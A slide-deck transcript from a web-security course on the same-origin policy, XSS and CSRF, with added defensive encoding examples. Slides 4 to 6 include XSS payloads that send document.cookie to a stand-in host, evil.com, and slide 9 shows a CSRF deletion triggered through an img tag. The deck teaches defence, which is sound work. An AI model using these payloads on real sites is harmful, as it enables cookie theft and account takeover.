
Selected Topics on Website Security @ 102-2 CCSP

Concept of Same Origin Policy, XSS, CSRF & Clickjacking

Johnson Liang

May 29, 2014
Transcript

  1. Selected Topics on Website Security
     Concept of Same Origin Policy, XSS, CSRF & Clickjacking
     MrOrz, 102-2 CCSP
     Reference: 白帽子講 Web 安全
  2. (Chinese cover slide with the same content; its Chinese title did not survive extraction.)
     Concept of Same Origin Policy, XSS, CSRF & Clickjacking
     MrOrz, 102-2 CCSP
     Reference: 白帽子講 Web 安全
  3. Same Origin vs. Different Origin
     (Diagram: what a page may read from its own origin and what it may not read from a different one; the labels did not survive extraction.)
     If there were no same-origin policy, then upon visiting http://evil.mobile.org:

       $.get('http://facebook.com', {}, function(data){
         // your Facebook wall, obtained without your permission
       }, 'html');

     The policy is what makes the browser refuse to hand the response of this cross-origin request to evil.mobile.org's script, even though the request is sent with your Facebook cookies.
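The comparison the browser performs for that decision, as an added example that is not part of the original deck: two URLs share an origin only when scheme, host and port all match, and an omitted port means the scheme's default port. The function names and the test cases are constructed for this illustration; the code uses Node's built-in WHATWG `URL` class.

```javascript
// Added example (not from the slides): the origin comparison behind the
// same-origin policy. Two URLs share an origin only when scheme, host and
// port all match (RFC 6454); a default port counts the same as an explicit one.

const DEFAULT_PORTS = { 'http:': '80', 'https:': '443', 'ws:': '80', 'wss:': '443' };

// Origin tuple of a URL. Node's URL drops a default port (port === ''), so it
// is filled back in to make "http://a.example" equal "http://a.example:80".
function originOf(urlString) {
  const u = new URL(urlString);
  const port = u.port || DEFAULT_PORTS[u.protocol] || '';
  return { scheme: u.protocol, host: u.hostname, port };
}

function sameOrigin(a, b) {
  const x = originOf(a), y = originOf(b);
  return x.scheme === y.scheme && x.host === y.host && x.port === y.port;
}

// May a script running in pageUrl read the response of a request to targetUrl?
// Under the same-origin policy: only for the same origin. (Cross-origin reads
// need the target server's explicit CORS opt-in, which is not covered here.)
function canReadResponse(pageUrl, targetUrl) {
  return sameOrigin(pageUrl, targetUrl);
}

// Constructed cases: the slide's evil.mobile.org page cannot read facebook.com,
// and a different scheme, subdomain or port is a different origin too.
const CASES = [
  ['http://evil.mobile.org/',  'http://facebook.com/',        false],
  ['http://facebook.com/',     'http://facebook.com:80/feed', true],
  ['https://facebook.com/',    'http://facebook.com/',        false],
  ['http://www.facebook.com/', 'http://facebook.com/',        false],
  ['http://facebook.com/',     'http://facebook.com:8080/',   false],
];

// true when every constructed case gets the expected verdict.
function runCases() {
  return CASES.every(([page, target, expected]) => canReadResponse(page, target) === expected);
}

if (typeof module !== 'undefined' && require.main === module) {
  for (const [page, target, expected] of CASES) {
    console.log(`${page} -> ${target}: ${canReadResponse(page, target)} (expected ${expected})`);
  }
}
```

Note that only the path is ignored; everything else in the URL before it participates, which is why `http://www.facebook.com` and `http://facebook.com` are different origins even though they belong to the same site.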
  4. Your site : Example #1
     The intro section is rendered from the user's own profile description, unescaped:

       <section class="intro">
         <script type="text/javascript">
           $.getJSON('http://evil.com/', { stoken: document.cookie });
         </script>
       </section>

     Whoever views this user's page has their cookie sent to evil.com.
  5. Your site : Example #2
     Here the user-supplied title is inserted into a JavaScript string literal inside a script block. A title of `"; $.getJSON(...); "` closes the string and runs its own code:

       <script type="text/javascript">
         var pageTitle = ""; $.getJSON(...); "";
       </script>

     Whoever views this user's page has their data stolen.
  6. Your site : Example #3
     The page title comes back as JSON and is written into the DOM with .html():

       $.getJSON('http://yoursite.com/page/'+pageId, {}, function(data){
         $('h1').html(data.userPageTitle);
       });

     A string the user typed freely:

       <h1>Welcome to my page!<script>$.getJSON('http://evil.com',...);</script></h1>

     This is DOM-based XSS: the server sent plain JSON, the injection happens in the client-side script. Note that jQuery's .html(), unlike a bare innerHTML assignment, evaluates the <script> elements in the string it inserts, so the payload runs as soon as the title is rendered.
  7. Defense: check HTML on output — Caja-HTML-Sanitizer

       // Controller
       var sanitizer = require('sanitizer');
       var sanitizedIntro = sanitizer.sanitize(user.desc);

       <!-- View -->
       <section class="intro">
         <%- sanitizedIntro %>
       </section>

     Keeps the harmless HTML tags and strips the rest. The EJS <%- %> tag outputs without HTML escaping, which is intended here because the sanitizer's output is meant to be rendered as markup; a field that is plain text, not HTML, should instead go through the escaping <%= %> tag.
  8. Defense against DOM-based XSS: use .text(…) instead of .html(…) wherever possible, or sanitize the HTML you want to insert first.

       $.getJSON('http://yoursite.com/page/'+pageId, {}, function(data){
         $('h1').text(data.userPageTitle);
       });
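Examples #1 to #3 put user input into three different slots, and the sanitizer of slide 7 only fits one of them. The block below, an added example that is not from the deck or from the Caja sanitizer, shows the output encoding each slot needs: HTML escaping for the body of Example #1, and a JavaScript string-literal encoder for the script slot of Example #2. The encoders and the payload strings are constructed for this illustration; the `...` inside `$.getJSON(...)` is kept as the slide shows it.

```javascript
// Added example (not from the slides): output encoding chosen per context.
// Examples #1/#3 inject into HTML body; Example #2 injects into a JavaScript
// string literal. Each slot has its own encoder; these are written here for
// illustration, not taken from a library.

// HTML body / attribute context: make the five significant characters inert.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// JavaScript string literal inside a <script> block. JSON.stringify quotes the
// value and escapes quotes, backslashes and newlines, but it does not stop
// "</script>" (the HTML parser ends the script element before any JS runs) or
// U+2028/U+2029 (line terminators in older engines); those are \u-escaped too.
function jsStringLiteral(s) {
  return JSON.stringify(String(s)).replace(/[<>&\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Templates mirroring the two slides, each with the encoder that fits its slot.
function renderIntro(userDesc) {           // Example #1 slot: HTML body
  return '<section class="intro">' + escapeHtml(userDesc) + '</section>';
}
function renderTitleScript(userTitle) {    // Example #2 slot: JS string literal
  return '<script type="text/javascript">var pageTitle = ' +
    jsStringLiteral(userTitle) + ';</script>';
}

// Constructed payloads modelled on the slides.
const PAYLOAD_HTML  = '<script>$.getJSON(\'http://evil.com/\', { stoken: document.cookie });</script>';
const PAYLOAD_JS    = '"; $.getJSON(...); "';
const PAYLOAD_CLOSE = '</script><script>alert(1)</script>'; // breakout that JSON.stringify alone would miss

function renderAll() {
  return {
    intro: renderIntro(PAYLOAD_HTML),        // <script> arrives as &lt;script&gt;: text, not markup
    title: renderTitleScript(PAYLOAD_JS),    // the quotes stay inside the literal
    close: renderTitleScript(PAYLOAD_CLOSE), // no second </script> reaches the HTML parser
  };
}
```

The point of the third payload is that the right encoder is decided by where the output lands, not by what the input looks like: a value that is safe as an HTML text node is still dangerous inside a script block unless the `<` in `</script>` is encoded as well.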
  9. Your site : Example #4

       // Delete current user account
       app.get('/user/delete', userCtrl.delete);

     A state-changing action on a GET route: any other site can trigger it with a link or an <img src="http://yoursite.com/user/delete">, and the browser attaches the victim's session cookie to that request. This is the CSRF case the next slide defends against.
 10. Defense: http://stackoverflow.com/questions/20420762/how-to-enable-csrf-in-express3

       // Express settings
       app.use(express.cookieParser('optional secret string'));
       app.use(express.session());
       app.use(express.csrf());
       app.use(function (req, res, next) {
         res.locals.csrftoken = req.csrfToken();
         next();
       });

       <!-- View -->
       <form action="..." method="post">
         <input type="hidden" name="_csrf" value="<%= csrftoken %>">
       </form>

     This makes the anti-CSRF token kept in the session visible to the view as well. The middleware only checks the token on state-changing methods and waves GET, HEAD and OPTIONS through, so the GET route of Example #4 must also be changed to a POST (or DELETE) route for the check to apply to it.